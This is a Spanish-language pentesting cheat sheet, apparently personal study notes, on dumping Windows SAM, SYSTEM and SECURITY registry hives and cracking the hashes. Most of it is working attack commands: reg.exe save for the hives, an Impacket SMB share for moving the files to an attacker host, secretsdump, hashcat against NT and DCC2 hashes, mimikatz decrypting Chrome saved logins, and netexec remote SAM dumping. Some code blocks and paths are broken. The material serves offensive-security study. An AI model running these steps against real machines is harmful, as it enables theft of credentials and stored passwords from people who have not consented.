Windows - Dumpeo SAM/SYSTEM/SECURITY y Cracking

Con acceso administrativo a un sistema Windows, podemos dumpear los archivos del SAM y otras claves para romper hashes offline, evitando mantener sesión activa.


📝 Hives importantes del registro

Hive Contenido Uso
HKLM\SAM Hashes de usuarios locales Para crackear contraseñas offline 🔓
HKLM\SYSTEM Clave de arranque del sistema Necesaria para desencriptar SAM 🔑
HKLM\SECURITY Información sensible de LSA, DCC2, DPAPI Credenciales de dominio cacheadas, secretos LSA 🕵️‍♂️

💾 Copiar hives con reg.exe

Ejemplo:

reg.exe save HKLM\SAM C:\Users\Public\sam.save
reg.exe save HKLM\SYSTEM C:\Users\Public\system.save
reg.exe save HKLM\SECURITY C:\Users\Public\security.save

Recuerda que el powershell debe tener permiso de administrado


📤 Transferir hives al host atacante

  1. Crear un share con Impacket:

    sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/usuario/Documents/
    
  2. Mover archivos desde Windows:

    move C:\Users\Public\sam.save \\<IP>\CompData
    
move C:\Users\Public\system.save \\CompData
move C:\Users\Public\security.save \
\CompData
```
3. Comprobar en host atacante:
{010907CD-2391-45BC-B69F-00A7E229E83D}.png

🔑 Dumpeo de hashes con secretsdump.py

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

Ejemplo:
{AEBD8DE5-DFB3-4A62-89C9-D4954D203ECE}.png


🖥️ Crackeo de hashes con Hashcat

  1. Guardar hashes NT en un archivo:
    64f12cddaa88057e06a81b54e73b949b
    

31d6cfe0d16ae931b73c59d7e0c089c0
```
hay guardad el segundo:
2. Crackear hashes NT:

sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt
  1. Crackear hashes DCC2 (credenciales de dominio cacheadas):
hashcat -m 2100 '$DCC2$10240#administrator#<hash>' /usr/share/wordlists/rockyou.txt

🔐 DPAPI (Data Protection API)

DPAPI es una API de Windows para cifrado que protege datos de usuarios y del sistema mediante claves machine y user.

mimikatz.exe dpapi::chrome /in:"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect

🌐 Dumpeo remoto y secretos LSA

LSA Secrets son valores protegidos por Windows en HKLM\SECURITY que contienen información sensible:

netexec smb --local-auth -u -p <contraseña> --sam
```